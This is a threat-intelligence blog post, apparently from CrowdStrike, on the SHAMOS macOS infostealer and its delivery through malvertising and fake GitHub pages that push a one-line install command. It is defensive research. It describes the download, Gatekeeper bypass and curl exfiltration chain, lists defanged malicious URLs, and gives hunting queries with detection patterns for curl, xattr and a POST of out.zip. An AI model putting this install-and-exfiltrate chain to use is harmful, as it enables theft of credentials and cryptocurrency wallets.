Falcon Platform Prevents COOKIE SPIDER’s SHAMOS Delivery on macOS

Between June and August 2025, the CrowdStrike Falcon® platform successfully blocked a sophisticated malware campaign that attempted to compromise over 300 customer environments. The campaign deployed SHAMOS, a variant of Atomic macOS Stealer (AMOS) developed by the cybercriminal group COOKIE SPIDER.

Operating as malware-as-a-service, COOKIE SPIDER rents this information stealer to cybercriminals who deploy it to harvest sensitive information and cryptocurrency assets from victims. The campaign utilized malvertising to direct users to fraudulent macOS help websites where victims were instructed to execute a malicious one-line installation command.

This campaign underscores the popularity of malicious one-line installation commands among eCrime actors. This technique allows them to bypass Gatekeeper security checks and install the Mach-O executable directly onto victim devices. Cuckoo Stealer and SHAMOS operators have previously leveraged this method in Homebrew malvertising campaigns occurring between May 2024 and January 2025.

Details

In an exemplar campaign from June 2025, when the victim searches for a macOS-related issue — for example, “macos flush resolver cache” — they receive a promoted malvertising website in their search results (Figure 1). Users located in multiple countries — including the U.S., UK, Japan, China, Colombia, Canada, Mexico, Italy, and others — received these advertisements; no victims were located in Russia. This is likely due to the fact that Russian eCrime forums prohibit commodity malware operators from targeting users based in Russia and other countries belonging to the Commonwealth of Independent States (CIS).

Since first reporting on this type of campaign in June 2025, CrowdStrike Counter Adverary Operations has continued to observe opportunistic eCrime threat actors leveraging malicious GitHub repositories to prompt victims to execute commands that download SHAMOS. Similar to the aforementioned activity, campaign operators allege to offer a free download of a tool designed for macOS; these tools involve video editing software, computer-aided design (CAD) products, macOS performance tools, AI software, and dictation software.

The threat actor(s) behind these pages continue to use the malicious one-line command to install SHAMOS. In some cases, the command is written entirely in plain text, and in others, the URL that hosts SHAMOS is Base64-encoded (Figure 6). 

SHAMOS Installation/Execution

The malicious installation command downloads SHAMOS Mach-O into the /tmp/ directory, removes extended file attributes using xattr likely for bypassing Gatekeeper checks, assigns executable permissions via chmod, and then executes the stealer. SHAMOS executes anti-VM commands to verify that the Mach-O is not executing in a suspected sandbox environment. The stealer then executes a variety of AppleScript commands for host reconnaissance and data collection tasks, including searching for known cryptocurrency-related wallet files and sensitive credential-based files on disk. SHAMOS attempts to exfiltrate collected sensitive files, including data from Keychain, AppleNotes, and browsers, using curl to transmit the data in a ZIP archive named out.zip (Figure 7).

Additional Reporting

Open-source reporting detailed an additional malvertising campaign related to the observed activity. This campaign involved a GitHub repository masquerading as iTerm2’s GitHub repository, located at https[:]//github[.]com/jeryrymoore/Iterm2, that contained instructions detailing how to download iTerm2, a terminal emulator for macOS (Figure 9).¹

The malicious one-line installation command is nearly identical to the command used in the malvertising campaign; however, the campaign’s Bash script host URL is not Base64-encoded. The Bash script — retrieved from https[:]//macostutorial[.]com/iterm2/install[.]sh — downloads SHAMOS from https[:]//macostutorial[.]com/iterm2/update.

CrowdStrike Falcon Coverage

CrowdStrike employs a layered approach for malware detection using machine learning and indicators of attack (IOAs). As shown in Figure 10, the CrowdStrike Falcon® sensor’s machine learning capabilities and behavior-based detection capabilities (IOAs) can automatically detect and prevent SHAMOS in the initial stages of the attack chain (i.e., as soon as the malware is downloaded onto the victim’s machine and at execution of the malicious shell script). Additionally, IOAs can recognize malicious behavior at further stages in the attack chain, including when the threat actor attempts to employ tactics like data collection, persistence, execution of further binaries, and data exfiltration. 

Assessment

This campaign highlights that leveraging malvertising and the one-line installation-command technique to distribute macOS information stealers remains popular among eCrime actors. Promoting false malicious websites encourages more site traffic, which will lead to more potential victims. The one-line installation command enables eCrime actors to directly install the Mach-O executable onto the victim’s machine while bypassing Gatekeeper checks.

CrowdStrike Counter Adversary Operations assesses that eCrime actors will likely continue to leverage both malvertising and one-line installation commands to distribute macOS information stealers. This assessment is made with high confidence, as the combination has historically been successful, and these methods allow actors to bypass Gatekeeper checks.

Recommended Prevention Settings

To protect endpoints from this threat, CrowdStrike Falcon® Insight XDR customers should ensure the following prevention policy settings are configured:

• Suspicious process prevention
• Intelligence-sourced threat prevention

Threat Hunting Queries 

The following CrowdStrike Falcon® Next-Gen SIEM Advanced Event Search queries are provided to assist defenders in hunting for this and similar activity across their endpoints.

NOTE: Make sure to update the Falcon URL to the cloud in which your environment is currently configured (US1, US2, EU, etc.)

“Bash script execution with calls to risky LOOBINs”

event_platform=Mac #event_simpleName=ScriptControlScanInfo ScriptContent="*dscl*curl*xattr*chmod*"
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| groupBy([aid, GraphExplorer, ScriptContent])

“AppleScript execution under a binary from /tmp/”

event_platform=Mac #event_simpleName=ProcessRollup2 ImageFileName="*/tmp/*"
| join({event_platform=Mac #event_simpleName=ProcessRollup2 ImageFileName="*osascript" CommandLine="*-e*" | rename(field="CommandLine", as="ChildCommandLine") | rename(field="ImageFileName", as="ChildImageFileName")}, field=TargetProcessId, key=ParentProcessId, include=["ChildImageFileName", "ChildCommandLine"], limit=20000)
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| groupBy([aid, GraphExplorer, ImageFileName, CommandLine, ChildImageFileName, ChildCommandLine])

“Curl with commandline indicative of data exfil”

event_platform=Mac #event_simpleName=ProcessRollup2 FileName=curl CommandLine="*POST*out.zip*"
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| groupBy([aid, GraphExplorer, ImageFileName, CommandLine])

Indicators of Compromise (IOCs)

MITRE ATT&CK Framework

The following table maps reported COOKIE SPIDER and SHAMOS tactics, techniques, and procedures (TTPs) to the MITRE ATT&CK® framework.

Additional Resources

• Learn how CrowdStrike’s Threat Intelligence and Hunting solutions are transforming security operations to better protect your business.
• Tune into the Adversary Universe Podcast, where CrowdStrike experts discuss today’s threat actors — who they are, what they’re after, and how you can defend against them.
• Download the CrowdStrike 2025 Global Threat Report and CrowdStrike 2025 Threat Hunting Report.

1. The legitimate iTerm2 GitHub repository is located at https[:]//github[.]com/gnachman/iTerm2.